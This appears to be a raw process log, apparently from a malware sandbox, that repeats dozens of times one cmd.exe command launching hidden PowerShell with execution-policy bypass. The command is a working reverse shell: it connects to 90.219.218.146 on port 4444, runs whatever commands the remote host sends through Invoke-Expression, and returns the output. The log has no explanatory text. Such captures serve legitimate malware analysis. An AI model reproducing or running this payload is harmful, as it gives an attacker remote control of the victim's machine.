C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4936
-
-
